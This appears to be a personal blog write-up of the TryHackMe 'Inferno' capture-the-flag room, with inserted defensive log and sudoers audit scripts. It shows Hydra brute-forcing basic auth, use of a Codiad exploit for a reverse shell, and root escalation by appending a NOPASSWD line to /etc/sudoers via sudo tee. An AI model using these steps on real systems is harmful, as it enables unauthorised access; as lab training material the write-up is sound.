TryHackMe | Inferno

I recently completed the TryHackMe room Inferno.  This was a medium-rated room and I think that was a pretty accurate rating.

I started this capture the flag room the same as any other, with a port scan using the nmap tool.

gareth@enso:~/Desktop/Files/Inferno$ nmap -F 10.10.170.49 -oN inferno.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-13 21:28 CEST
Nmap scan report for 10.10.170.49
Host is up (0.039s latency).
Not shown: 97 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
106/tcp open  pop3pw

I could see there was a web server running on port 80, so I decided to scan for hidden directories.  My initial scan using the common.txt wordlist returned nothing of interest, so I tried again with the medium directory list.  This turned up a directory called inferno that was protected by basic authentication.

gareth@enso:~/Desktop/Files/Inferno$ gobuster dir -u http://10.10.170.49 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.170.49
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/13 21:31:58 Starting gobuster in directory enumeration mode
===============================================================
/inferno              (Status: 401) [Size: 459]

I then used Hydra to brute-force the password for this area, assuming the default username 'admin' was the one in use.  Luckily this assumption paid off and I gained access to the area.

gareth@enso:~/Desktop/Files/Inferno$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 10.10.170.49 http-get /inferno -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-13 21:34:33
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.170.49:80/inferno
[80][http-get] host: 10.10.170.49   login: admin   password: <redacted>
[STATUS] attack finished for 10.10.170.49 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-13 21:35:28
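
From the defender's side, the gobuster and Hydra runs above leave a very recognisable trace in the web server's access log: a burst of 404s from one client, followed by a burst of 401s against /inferno. The script below is an added example (not from the room or the original post) that flags both patterns over constructed Apache combined-format log lines; the IPs, timestamps and user-agent strings in the sample are made up.

```python
import re
from collections import Counter, defaultdict

# Apache "combined" log format: ip ident user [ts] "req" status size "ref" "ua".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TOOL_UA = re.compile(r"gobuster|hydra|dirbuster|nmap", re.I)

def parse(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def analyse(lines, enum_threshold=20, auth_threshold=10):
    """Per source IP, flag a burst of 404s (wordlist directory enumeration),
    a burst of 401s on one path (basic-auth password guessing) and any
    user-agent that names a scanning tool."""
    not_found, unauth, tool_uas = Counter(), defaultdict(Counter), defaultdict(set)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue  # malformed line: skip rather than crash the pipeline
        if rec["status"] == "404":
            not_found[rec["ip"]] += 1
        elif rec["status"] == "401":
            unauth[rec["ip"]][rec["path"]] += 1
        if TOOL_UA.search(rec["ua"]):
            tool_uas[rec["ip"]].add(rec["ua"])
    findings = {}
    for ip, n in not_found.items():
        if n >= enum_threshold:
            findings.setdefault(ip, {})["enumeration"] = n
    for ip, paths in unauth.items():
        hot = {p: c for p, c in paths.items() if c >= auth_threshold}
        if hot:
            findings.setdefault(ip, {})["auth_bruteforce"] = hot
    for ip, uas in tool_uas.items():
        findings.setdefault(ip, {})["tool_ua"] = sorted(uas)
    return findings

# Constructed sample log (made-up client IPs and user-agents): 25 wordlist misses
# and 12 failed logins on /inferno from one client, one normal request from another.
SAMPLE_LOG = (
    [f'10.8.145.210 - - [13/Aug/2021:21:31:{i:02d} +0200] "GET /w{i} HTTP/1.1" 404 275 "-" "gobuster/3.1.0"' for i in range(25)]
    + [f'10.8.145.210 - admin [13/Aug/2021:21:34:{i:02d} +0200] "GET /inferno HTTP/1.1" 401 459 "-" "Mozilla/5.0 (Hydra)"' for i in range(12)]
    + ['10.8.1.5 - - [13/Aug/2021:21:40:00 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"']
)
```

Tune the two thresholds to the site's normal 404 and 401 rates; a real Hydra run produces far more than twelve 401s, so even a conservative threshold catches it.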

Codiad

This looks like a login for something called Codiad?

I was presented with a login form for what looked like a tool called "Codiad".  I searched for an exploit for Codiad using searchsploit and found the following.

gareth@enso:~/Desktop/Files/Inferno$ searchsploit Codiad
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities                   | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion                       | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated)      | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)  | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)  | multiple/webapps/49907.py
---------------------------------------------------------- ---------------------------------

Because these exploits required the user to be authenticated, I tried to reuse the credentials from the basic authentication.  This proved successful and I was able to log in.

After some trial and error I could not get any of them to work, so I searched GitHub instead and came across a repository containing an exploit for Codiad that I managed to get working.

I was able to get a reverse-shell on the machine by following the instructions in the exploit file.

Foothold

Now that I had a foothold on the server, it was time to enumerate.  I eventually found an interesting file in the /home/dante/Downloads directory called .download.dat, which contained what looked like hexadecimal.  I used CyberChef to convert this hexadecimal to ASCII and was presented with the following:

«Or se’ tu quel Virgilio e quella fonte
che spandi di parlar sì largo fiume?»,
rispuos’io lui con vergognosa fronte.

«O de li altri poeti onore e lume,
vagliami ’l lungo studio e ’l grande amore
che m’ha fatto cercar lo tuo volume.

Tu se’ lo mio maestro e ’l mio autore,
tu se’ solo colui da cu’ io tolsi
lo bello stilo che m’ha fatto onore.

Vedi la bestia per cu’ io mi volsi;
aiutami da lei, famoso saggio,
ch’ella mi fa tremar le vene e i polsi».

dante:<redacted>

With the credentials at the bottom I was able to access the server via SSH as the dante user and capture the user flag, which was hidden in the local.txt file in the home directory.

gareth@enso:~/Desktop/Files/Inferno$ ssh dante@10.10.170.49
dante@10.10.170.49's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-130-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Aug 13 20:11:10 UTC 2021

  System load:  0.0               Processes:           1198
  Usage of /:   42.0% of 8.79GB   Users logged in:     0
  Memory usage: 61%               IP address for eth0: 10.10.170.49
  Swap usage:   0%


39 packages can be updated.
0 updates are security updates.


Last login: Fri Aug 13 20:10:56 2021 from 10.8.145.210
dante@Inferno:~$ cat local.txt

Privilege Escalation

From running the command sudo -l I could see that the dante user has permission to run the tee command as root via sudo.

dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee

A quick check on GTFOBins showed me how to use this command to gain write access to any file on the file system.

LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"

I used this to append a line for the dante user to the /etc/sudoers file, allowing him to run any command via sudo without a password.  From there I was able to spawn a root shell and capture the root flag.

dante@Inferno:~$ LFILE=/etc/sudoers
dante@Inferno:~$ echo "dante ALL=(root) NOPASSWD: ALL" | sudo tee -a "$LFILE"
dante ALL=(root) NOPASSWD: ALL
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
    (root) NOPASSWD: ALL
dante@Inferno:~$ sudo su
root@Inferno:/home/dante# cd /root
root@Inferno:~# ls
proof.txt
root@Inferno:~# cat proof.txt
Congrats!

You've rooted Inferno!

<redacted>

mindsflee
root@Inferno:~#
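
The sudoers entry above is what made the escalation trivial, and it is exactly the kind of entry a configuration audit should catch before anyone abuses it. As an added example (not part of the original write-up), the following script parses a constructed sudoers file mirroring the room's entry and flags commands that GTFOBins lists as giving arbitrary file write as the run-as user, with NOPASSWD raising the severity; the binary list is a small assumed subset, not the full GTFOBins catalogue.

```python
import re

# Binaries GTFOBins lists as giving arbitrary file write when run via sudo
# (assumed short subset for this example).
FILE_WRITE_BINS = {"tee", "dd", "cp", "mv"}
SKIP = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")

# user host=(runas) TAG: cmd, cmd ...   (the common shape of a user specification)
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def parse_sudoers(text):
    """Yield one record per user-specification line; comments, Defaults and
    alias lines are skipped and #include directives are not followed."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.split()[0] in SKIP:
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        cmds = [c.strip() for c in m["cmds"].split(",") if c.strip()]
        yield {"user": m["user"], "runas": m["runas"] or "root", "tags": tags, "cmds": cmds}

def audit(text):
    """Flag entries that grant an unrestricted command set or a file-writing
    binary; NOPASSWD means no credential is needed, so severity goes up."""
    findings = []
    for rec in parse_sudoers(text):
        sev = "critical" if "NOPASSWD" in rec["tags"] else "high"
        for cmd in rec["cmds"]:
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = "unrestricted command set"
            elif binary in FILE_WRITE_BINS:
                reason = f"{binary} writes arbitrary files as {rec['runas']}"
            else:
                continue
            findings.append({"severity": sev, "user": rec["user"], "cmd": cmd, "reason": reason})
    return findings

# Constructed sudoers content mirroring the entry shown in the sudo -l output above.
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
dante   ALL=(root) NOPASSWD: /usr/bin/tee
"""
```

Running audit over the same content with the appended "dante ALL=(root) NOPASSWD: ALL" line produces a second critical finding, which is the change a file-integrity check on /etc/sudoers should also have raised.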

Summary

This room took a bit of time to gain a foothold, because I was not familiar with Codiad and spent a lot of time trying to find an exploit for it that actually worked.  The reverse shell gained from the exploit found on GitHub was a bit flaky so I had to enumerate quickly.  I was thankful this room contained a step where I obtained the SSH user password so I could gain a more stable connection.

Thankfully the privilege escalation on this one was quite straightforward, due to some poor configuration on the server and the great resource that is GTFOBins.

Gareth Oates

Oslo, Norway